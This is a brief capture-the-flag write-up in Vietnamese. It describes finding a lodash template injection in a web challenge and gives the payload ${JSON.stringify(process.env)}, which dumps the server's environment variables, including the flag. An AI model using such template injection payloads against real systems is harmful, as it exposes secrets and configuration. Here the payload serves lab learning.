
** Challenge 1
thử ${3*3} -> 9
=> Xác định chall thuộc loại ssti
thử freemarker thì không được
sau được hint thì đọc source code thấy có lodash.template (lúc chưa đọc thử freemarker thì thấy thông báo lỗi nhưng k biết lodash là template)
search GG lodash template injection thì được payload:

content= ${JSON.stringify(process.env)}
id = 3f512039-5fde-4cb2-8d0b-50d90f282338

-> kết quả :
{"NODE_VERSION":"14.17.3","HOSTNAME":"8db7a560fb48","YARN_VERSION":"1.22.5","HOME":"/root","flag":"KCSC{lodash_template_injection_so_ezzzz}","PATH":"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","PWD":"/usr/src/app"}
KCSC{lodash_template_injection_so_ezzzz}
